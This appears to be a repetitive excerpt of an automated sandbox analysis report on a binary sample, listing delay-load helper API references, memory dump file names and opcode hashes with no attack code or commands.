                                                                                                                                  • Instruction Fuzzy Hash: CEB012E125D145AC3154510D2C03CF7029EF1C5B11330C13FFC15C03C0D840BC001472
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 266addbf2c029d0dc226bc790af4667453a68dc9d70b1413733a0763fc123bba
                                                                                                                                  • Instruction ID: 254f4e1f3bedb5785338521db46e567ba2fcb7a5f7b004232c9e5a741761dfea
                                                                                                                                  • Opcode Fuzzy Hash: 266addbf2c029d0dc226bc790af4667453a68dc9d70b1413733a0763fc123bba
                                                                                                                                  • Instruction Fuzzy Hash: E2B092A1259245AC219452092802CB6029EE184B11330C23AF815C0380984068441432
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 7c1baf927e908fa5ecd5d4629d5af7c04eae16cba5491291c9777f9271d6fc24
                                                                                                                                  • Instruction ID: 564fc8949812ee62527181a1547cb08c22716e7b741539a086b94500d4805c35
                                                                                                                                  • Opcode Fuzzy Hash: 7c1baf927e908fa5ecd5d4629d5af7c04eae16cba5491291c9777f9271d6fc24
                                                                                                                                  • Instruction Fuzzy Hash: 17B012C12995057C311421282C06CFB029DF0C1F14730823FF421C07C1A8405D040433
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4d0e7cb437a0f1914a22f74f6f4d1928b9fe1d817260d7bb32906f75aa135dd1
                                                                                                                                  • Instruction ID: 08bb80d29294a5dda2be00f768389bbf4812634b319efc97e4d5d03a8e77d420
                                                                                                                                  • Opcode Fuzzy Hash: 4d0e7cb437a0f1914a22f74f6f4d1928b9fe1d817260d7bb32906f75aa135dd1
                                                                                                                                  • Instruction Fuzzy Hash: E2B012C229A5467C3114620D2D02CFB069DE0C1F14330C33FF515C03C0E8405C010433
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 5f2628af3e55bd9a55f7f2d984744e8af747b268276bd1d1554b32eade8cc6ce
                                                                                                                                  • Instruction ID: 593c2347e32093177c22d26af6f9b3958a431f684540d25591a1b66a0e173dc5
                                                                                                                                  • Opcode Fuzzy Hash: 5f2628af3e55bd9a55f7f2d984744e8af747b268276bd1d1554b32eade8cc6ce
                                                                                                                                  • Instruction Fuzzy Hash: 77B012C229A5057D3114620C2C02DFB029DF0C1F14330833FF415C03C0E8405C040433
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: ab2eac76612f8843b159a18be6266d946f81cafc044468ae12eacae27b37013a
                                                                                                                                  • Instruction ID: 737bc85e47849a9cc16a1f7909cf6ef39baa4d46435b5cc24868fda3cb660b82
                                                                                                                                  • Opcode Fuzzy Hash: ab2eac76612f8843b159a18be6266d946f81cafc044468ae12eacae27b37013a
                                                                                                                                  • Instruction Fuzzy Hash: A9B012C16996057C3214610C6C07CFB029DE0C1F14330C33FF415C03C0E8405C840433
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: ac04fe57b9fa9c7aedef88862a45e37d65f1b188cf6ff2e03c04ee4681198281
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: ac04fe57b9fa9c7aedef88862a45e37d65f1b188cf6ff2e03c04ee4681198281
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: d6d91db13d2fd8dc2668b79d54b42c956668452730738fd5ed371fea1510b7e2
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: d6d91db13d2fd8dc2668b79d54b42c956668452730738fd5ed371fea1510b7e2
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 7bd9593b4e8e34efc61489cfa4df68b0eafbbac38e80afb452ae74210041253c
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 7bd9593b4e8e34efc61489cfa4df68b0eafbbac38e80afb452ae74210041253c
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4730ca02bf19e59ca8d92a420331a488aaed83ddc7ac1c2e2d74ae93027036a8
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4730ca02bf19e59ca8d92a420331a488aaed83ddc7ac1c2e2d74ae93027036a8
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4b53e48acfb03d35d879d72a5a39eb33d2717281b4c7e4493ec81c6466b48644
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4b53e48acfb03d35d879d72a5a39eb33d2717281b4c7e4493ec81c6466b48644
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 485a526209b4cfeefadb66cd16f34e66f57189c9025f92c0be49a7f83487cc21
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 485a526209b4cfeefadb66cd16f34e66f57189c9025f92c0be49a7f83487cc21
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 1a701ba5d55a359cbb14352a629c9bcc296431b4d9e21b4090d80b09c82bd0f6
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 1a701ba5d55a359cbb14352a629c9bcc296431b4d9e21b4090d80b09c82bd0f6
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 81d59d8d8a55a349b18179e8dce3c18bfec3f81a421dfb4a5f0e35d5f3ee5136
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 81d59d8d8a55a349b18179e8dce3c18bfec3f81a421dfb4a5f0e35d5f3ee5136
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4dbd4176072d46970db712c00e4b355ccfaa9956c4820b7c7d16e5a25fb8ac21
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4dbd4176072d46970db712c00e4b355ccfaa9956c4820b7c7d16e5a25fb8ac21
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
